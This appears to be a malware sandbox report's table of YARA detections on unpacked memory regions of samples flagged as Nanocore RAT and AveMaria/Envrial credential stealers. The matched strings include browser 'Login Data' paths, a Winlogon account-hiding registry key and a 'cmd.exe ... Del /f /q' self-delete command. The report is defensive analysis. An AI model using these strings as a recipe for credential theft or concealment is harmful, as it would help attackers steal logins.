40.2.KetqqsbuJ.exe.3e7fc2f.13.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x170b:$x1: NanoCore.ClientPluginHost 0x1725:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.3e7fc2f.13.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x170b:$x2: NanoCore.ClientPluginHost 0x34b6:$s4: PipeCreated 0x16f8:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.6c30000.29.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3deb:$x1: NanoCore.ClientPluginHost 0x3f48:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.6c30000.29.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x3deb:$x2: NanoCore.ClientPluginHost 0x4d41:$s3: PipeExists 0x3fe1:$s4: PipeCreated 0x3e05:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.2d270d0.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.2d270d0.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2dbb:$x2: NanoCore.ClientPluginHost 0x4c6b:$s4: PipeCreated
40.2.KetqqsbuJ.exe.3d08a28.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.3d08a28.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.3d08a28.9.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
40.2.KetqqsbuJ.exe.6c00000.26.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3f0b:$x1: NanoCore.ClientPluginHost 0x3f44:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.6c00000.26.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x3f0b:$x2: NanoCore.ClientPluginHost 0x400f:$s4: PipeCreated 0x3f25:$s5: IClientLoggingHost
7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x18078:$a1: \Opera Software\Opera Stable\Login Data 0x183a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x17ce8:$a3: \Google\Chrome\User Data\Default\Login Data
7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
7.2.Xjf4yH9N2t.exe.400000.1.raw.unpack	AveMaria_WarZone	unknown	unknown	0x1a120:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x19e74:$str2: MsgBox.exe 0x19d48:$str6: Ave_Maria 0x193e8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x18a08:$str8: SMTP Password 0x17ce8:$str11: \Google\Chrome\User Data\Default\Login Data 0x193c0:$str12: \sqlmap.dll
40.2.KetqqsbuJ.exe.5160000.18.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.5160000.18.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.40006e6.16.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x170b:$x1: NanoCore.ClientPluginHost 0x1725:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.40006e6.16.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x170b:$x2: NanoCore.ClientPluginHost 0x34b6:$s4: PipeCreated 0x16f8:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.3cae5cf.7.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1a53c:$x1: NanoCore.ClientPluginHost 0x1a556:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.3cae5cf.7.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1a53c:$x2: NanoCore.ClientPluginHost 0x1d879:$s4: PipeCreated 0x1a529:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.6c8e8a4.34.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10937:$x1: NanoCore.ClientPluginHost 0x10951:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.6c8e8a4.34.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x10937:$x2: NanoCore.ClientPluginHost 0x13c74:$s4: PipeCreated 0x10924:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.400000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
40.2.KetqqsbuJ.exe.400000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.400000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
40.2.KetqqsbuJ.exe.400000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
7.2.Xjf4yH9N2t.exe.400000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x16678:$a1: \Opera Software\Opera Stable\Login Data 0x169a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x162e8:$a3: \Google\Chrome\User Data\Default\Login Data
7.2.Xjf4yH9N2t.exe.400000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.Xjf4yH9N2t.exe.400000.1.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
7.2.Xjf4yH9N2t.exe.400000.1.unpack	AveMaria_WarZone	unknown	unknown	0x18720:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x18474:$str2: MsgBox.exe 0x18348:$str6: Ave_Maria 0x179e8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x17008:$str8: SMTP Password 0x162e8:$str11: \Google\Chrome\User Data\Default\Login Data 0x179c0:$str12: \sqlmap.dll
40.2.KetqqsbuJ.exe.2d479bc.3.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x16e3:$x1: NanoCore.ClientPluginHost 0xb577:$x1: NanoCore.ClientPluginHost 0x134e1:$x1: NanoCore.ClientPluginHost 0x1d1e4:$x1: NanoCore.ClientPluginHost 0x26c93:$x1: NanoCore.ClientPluginHost 0x31103:$x1: NanoCore.ClientPluginHost 0x3c129:$x1: NanoCore.ClientPluginHost 0x47f13:$x1: NanoCore.ClientPluginHost 0x53cd2:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost 0xb5b0:$x2: IClientNetworkHost 0x1351a:$x2: IClientNetworkHost 0x26df0:$x2: IClientNetworkHost 0x3113c:$x2: IClientNetworkHost 0x3c143:$x2: IClientNetworkHost 0x47f2d:$x2: IClientNetworkHost 0x53d0f:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.2d479bc.3.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x16e3:$x2: NanoCore.ClientPluginHost 0xb577:$x2: NanoCore.ClientPluginHost 0x134e1:$x2: NanoCore.ClientPluginHost 0x1d1e4:$x2: NanoCore.ClientPluginHost 0x26c93:$x2: NanoCore.ClientPluginHost 0x31103:$x2: NanoCore.ClientPluginHost 0x3c129:$x2: NanoCore.ClientPluginHost 0x47f13:$x2: NanoCore.ClientPluginHost 0x53cd2:$x2: NanoCore.ClientPluginHost 0x27be9:$s3: PipeExists 0x1800:$s4: PipeCreated 0xb67b:$s4: PipeCreated 0x135fc:$s4: PipeCreated 0x1d2c2:$s4: PipeCreated 0x26e89:$s4: PipeCreated 0x3124e:$s4: PipeCreated 0x3d15e:$s4: PipeCreated 0x49cbe:$s4: PipeCreated 0x57125:$s4: PipeCreated 0x16fd:$s5: IClientLoggingHost 0xb591:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.2d479bc.3.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x142b:$a: NanoCore 0x1484:$a: NanoCore 0x14b7:$a: NanoCore 0x16e3:$a: NanoCore 0x175f:$a: NanoCore 0x1d78:$a: NanoCore 0x1ec1:$a: NanoCore 0x2395:$a: NanoCore 0x267c:$a: NanoCore 0x2693:$a: NanoCore 0xb577:$a: NanoCore 0xb5f3:$a: NanoCore 0xded6:$a: NanoCore 0x134e1:$a: NanoCore 0x1355b:$a: NanoCore 0x1d1e4:$a: NanoCore 0x1d22e:$a: NanoCore 0x1de88:$a: NanoCore 0x26c93:$a: NanoCore 0x26d7d:$a: NanoCore 0x27bf4:$a: NanoCore
40.2.KetqqsbuJ.exe.2cf4ec4.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.2cf4ec4.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.3fe9487.14.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x39eb:$x1: NanoCore.ClientPluginHost 0xe9c8:$x1: NanoCore.ClientPluginHost 0x1a76a:$x1: NanoCore.ClientPluginHost 0x3f66e:$x1: NanoCore.ClientPluginHost 0x4eaae:$x1: NanoCore.ClientPluginHost 0x3a24:$x2: IClientNetworkHost 0xe9e2:$x2: IClientNetworkHost 0x1a784:$x2: IClientNetworkHost 0x3f688:$x2: IClientNetworkHost 0x4eaeb:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.3fe9487.14.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x39eb:$x2: NanoCore.ClientPluginHost 0xe9c8:$x2: NanoCore.ClientPluginHost 0x1a76a:$x2: NanoCore.ClientPluginHost 0x3f66e:$x2: NanoCore.ClientPluginHost 0x4eaae:$x2: NanoCore.ClientPluginHost 0x3b36:$s4: PipeCreated 0xf9fd:$s4: PipeCreated 0x1c515:$s4: PipeCreated 0x429ab:$s4: PipeCreated 0x51f01:$s4: PipeCreated 0x3a05:$s5: IClientLoggingHost 0xe9b5:$s5: IClientLoggingHost 0x1a757:$s5: IClientLoggingHost 0x3f65b:$s5: IClientLoggingHost 0x4ead8:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.3fe9487.14.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x36cb:$a: NanoCore 0x372c:$a: NanoCore 0x376f:$a: NanoCore 0x37af:$a: NanoCore 0x39eb:$a: NanoCore 0x3a8b:$a: NanoCore 0x4263:$a: NanoCore 0x4856:$a: NanoCore 0x49a7:$a: NanoCore 0x5801:$a: NanoCore 0x5a68:$a: NanoCore 0x5a7d:$a: NanoCore 0x5a9c:$a: NanoCore 0xe99f:$a: NanoCore 0xe9c8:$a: NanoCore 0x1a741:$a: NanoCore 0x1a76a:$a: NanoCore 0x3f62d:$a: NanoCore 0x3f645:$a: NanoCore 0x3f66e:$a: NanoCore 0x4ea71:$a: NanoCore
40.2.KetqqsbuJ.exe.3ca9930.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1f1db:$x1: NanoCore.ClientPluginHost 0x1f1f5:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.3ca9930.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1f1db:$x2: NanoCore.ClientPluginHost 0x22518:$s4: PipeCreated 0x1f1c8:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.3ff22b6.15.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3d99:$x1: NanoCore.ClientPluginHost 0xcd3b:$x1: NanoCore.ClientPluginHost 0x3db3:$x2: IClientNetworkHost 0xcd55:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.3ff22b6.15.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x3d99:$x2: NanoCore.ClientPluginHost 0xcd3b:$x2: NanoCore.ClientPluginHost 0x4dce:$s4: PipeCreated 0x3d86:$s5: IClientLoggingHost 0xcd28:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.5280000.21.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.5280000.21.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x4bbb:$x2: NanoCore.ClientPluginHost 0x6a6b:$s4: PipeCreated
40.2.KetqqsbuJ.exe.6c20000.28.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x13a8:$x1: NanoCore.ClientPluginHost
40.2.KetqqsbuJ.exe.6c20000.28.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x13a8:$x2: NanoCore.ClientPluginHost 0x1486:$s4: PipeCreated 0x13c2:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.6c84c9f.33.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1a53c:$x1: NanoCore.ClientPluginHost 0x1a556:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.6c84c9f.33.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1a53c:$x2: NanoCore.ClientPluginHost 0x1d879:$s4: PipeCreated 0x1a529:$s5: IClientLoggingHost
22.2.images.exe.400000.2.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x18078:$a1: \Opera Software\Opera Stable\Login Data 0x183a0:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x17ce8:$a3: \Google\Chrome\User Data\Default\Login Data
22.2.images.exe.400000.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
22.2.images.exe.400000.2.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
22.2.images.exe.400000.2.raw.unpack	AveMaria_WarZone	unknown	unknown	0x1a120:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x19e74:$str2: MsgBox.exe 0x19d48:$str6: Ave_Maria 0x193e8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x18a08:$str8: SMTP Password 0x17ce8:$str11: \Google\Chrome\User Data\Default\Login Data 0x193c0:$str12: \sqlmap.dll
40.2.KetqqsbuJ.exe.6c70000.32.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x170b:$x1: NanoCore.ClientPluginHost 0x1725:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.6c70000.32.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x170b:$x2: NanoCore.ClientPluginHost 0x34b6:$s4: PipeCreated 0x16f8:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.6c40000.30.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1deb:$x1: NanoCore.ClientPluginHost 0x1e24:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.6c40000.30.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1deb:$x2: NanoCore.ClientPluginHost 0x1f36:$s4: PipeCreated 0x1e05:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.6ab0000.25.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x16e3:$x1: NanoCore.ClientPluginHost 0x171c:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.6ab0000.25.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x16e3:$x2: NanoCore.ClientPluginHost 0x1800:$s4: PipeCreated 0x16fd:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.60a0000.24.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.60a0000.24.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.6c40000.30.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x39eb:$x1: NanoCore.ClientPluginHost 0x3a24:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.6c40000.30.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x39eb:$x2: NanoCore.ClientPluginHost 0x3b36:$s4: PipeCreated 0x3a05:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.6c50000.31.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5b99:$x1: NanoCore.ClientPluginHost 0x5bb3:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.6c50000.31.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5b99:$x2: NanoCore.ClientPluginHost 0x6bce:$s4: PipeCreated 0x5b86:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.3ff22b6.15.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5b99:$x1: NanoCore.ClientPluginHost 0x1193b:$x1: NanoCore.ClientPluginHost 0x3683f:$x1: NanoCore.ClientPluginHost 0x45c7f:$x1: NanoCore.ClientPluginHost 0x5bb3:$x2: IClientNetworkHost 0x11955:$x2: IClientNetworkHost 0x36859:$x2: IClientNetworkHost 0x45cbc:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.3ff22b6.15.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5b99:$x2: NanoCore.ClientPluginHost 0x1193b:$x2: NanoCore.ClientPluginHost 0x3683f:$x2: NanoCore.ClientPluginHost 0x45c7f:$x2: NanoCore.ClientPluginHost 0x6bce:$s4: PipeCreated 0x136e6:$s4: PipeCreated 0x39b7c:$s4: PipeCreated 0x490d2:$s4: PipeCreated 0x5b86:$s5: IClientLoggingHost 0x11928:$s5: IClientLoggingHost 0x3682c:$s5: IClientLoggingHost 0x45ca9:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.3e8db04.11.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
40.2.KetqqsbuJ.exe.3e8db04.11.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x1a4fb:$a: NanoCore 0x1a513:$a: NanoCore 0x1a53c:$a: NanoCore 0x29941:$a: NanoCore 0x29959:$a: NanoCore 0x2997e:$a: NanoCore 0x32b9d:$a: NanoCore 0x32bf6:$a: NanoCore 0x32c33:$a: NanoCore 0x32cac:$a: NanoCore 0x46357:$a: NanoCore 0x4636c:$a: NanoCore 0x463a1:$a: NanoCore 0x53fb6:$a: NanoCore 0x53fdb:$a: NanoCore 0x54034:$a: NanoCore 0x641d1:$a: NanoCore 0x641f7:$a: NanoCore 0x64253:$a: NanoCore 0x710a8:$a: NanoCore 0x71101:$a: NanoCore
40.2.KetqqsbuJ.exe.3e88e65.12.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d3db:$x1: NanoCore.ClientPluginHost 0x1d3f5:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.3e88e65.12.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1d3db:$x2: NanoCore.ClientPluginHost 0x20718:$s4: PipeCreated 0x1d3c8:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.6c10000.27.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x605:$x1: NanoCore.ClientPluginHost 0x63e:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.6c10000.27.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x605:$x2: NanoCore.ClientPluginHost 0x720:$s4: PipeCreated 0x61f:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.3ca9930.8.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d3db:$x1: NanoCore.ClientPluginHost 0x1d3f5:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.3ca9930.8.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1d3db:$x2: NanoCore.ClientPluginHost 0x20718:$s4: PipeCreated 0x1d3c8:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.6c10000.27.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2205:$x1: NanoCore.ClientPluginHost 0x223e:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.6c10000.27.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2205:$x2: NanoCore.ClientPluginHost 0x2320:$s4: PipeCreated 0x221f:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.6cc0000.36.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x41ee:$x1: NanoCore.ClientPluginHost 0x422b:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.6cc0000.36.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x41ee:$x2: NanoCore.ClientPluginHost 0x7641:$s4: PipeCreated 0x4218:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.2d3334c.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x15d53:$x1: NanoCore.ClientPluginHost 0x1fbe7:$x1: NanoCore.ClientPluginHost 0x27b51:$x1: NanoCore.ClientPluginHost 0x31854:$x1: NanoCore.ClientPluginHost 0x3b303:$x1: NanoCore.ClientPluginHost 0x45773:$x1: NanoCore.ClientPluginHost 0x50799:$x1: NanoCore.ClientPluginHost 0x5c583:$x1: NanoCore.ClientPluginHost 0x68342:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost 0x15d8c:$x2: IClientNetworkHost 0x1fc20:$x2: IClientNetworkHost 0x27b8a:$x2: IClientNetworkHost 0x3b460:$x2: IClientNetworkHost 0x457ac:$x2: IClientNetworkHost 0x507b3:$x2: IClientNetworkHost 0x5c59d:$x2: IClientNetworkHost 0x6837f:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.2d3334c.4.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x8ba5:$x2: NanoCore.ClientPluginHost 0x15d53:$x2: NanoCore.ClientPluginHost 0x1fbe7:$x2: NanoCore.ClientPluginHost 0x27b51:$x2: NanoCore.ClientPluginHost 0x31854:$x2: NanoCore.ClientPluginHost 0x3b303:$x2: NanoCore.ClientPluginHost 0x45773:$x2: NanoCore.ClientPluginHost 0x50799:$x2: NanoCore.ClientPluginHost 0x5c583:$x2: NanoCore.ClientPluginHost 0x68342:$x2: NanoCore.ClientPluginHost 0x9b74:$s2: FileCommand 0x3c259:$s3: PipeExists 0xe576:$s4: PipeCreated 0x15e70:$s4: PipeCreated 0x1fceb:$s4: PipeCreated 0x27c6c:$s4: PipeCreated 0x31932:$s4: PipeCreated 0x3b4f9:$s4: PipeCreated 0x458be:$s4: PipeCreated 0x517ce:$s4: PipeCreated 0x5e32e:$s4: PipeCreated
40.2.KetqqsbuJ.exe.2d3334c.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8b7f:$a: NanoCore 0x8ba5:$a: NanoCore 0x8c01:$a: NanoCore 0x15a9b:$a: NanoCore 0x15af4:$a: NanoCore 0x15b27:$a: NanoCore 0x15d53:$a: NanoCore 0x15dcf:$a: NanoCore 0x163e8:$a: NanoCore 0x16531:$a: NanoCore 0x16a05:$a: NanoCore 0x16cec:$a: NanoCore 0x16d03:$a: NanoCore 0x1fbe7:$a: NanoCore 0x1fc63:$a: NanoCore 0x22546:$a: NanoCore 0x27b51:$a: NanoCore 0x27bcb:$a: NanoCore 0x31854:$a: NanoCore 0x3189e:$a: NanoCore 0x324f8:$a: NanoCore
40.2.KetqqsbuJ.exe.6c00000.26.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x5b0b:$x1: NanoCore.ClientPluginHost 0x5b44:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.6c00000.26.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x5b0b:$x2: NanoCore.ClientPluginHost 0x5c0f:$s4: PipeCreated 0x5b25:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.6c80000.35.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1f1db:$x1: NanoCore.ClientPluginHost 0x1f1f5:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.6c80000.35.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1f1db:$x2: NanoCore.ClientPluginHost 0x22518:$s4: PipeCreated 0x1f1c8:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.2d3334c.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.2d3334c.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.6c30000.29.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x59eb:$x1: NanoCore.ClientPluginHost 0x5b48:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.6c30000.29.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x59eb:$x2: NanoCore.ClientPluginHost 0x6941:$s3: PipeExists 0x5be1:$s4: PipeCreated 0x5a05:$s5: IClientLoggingHost
40.2.KetqqsbuJ.exe.3fe9487.14.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1deb:$x1: NanoCore.ClientPluginHost 0x1e24:$x2: IClientNetworkHost
40.2.KetqqsbuJ.exe.3fe9487.14.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1deb:$x2: NanoCore.ClientPluginHost 0x1f36:$s4: PipeCreated 0x1e05:$s5: IClientLoggingHost
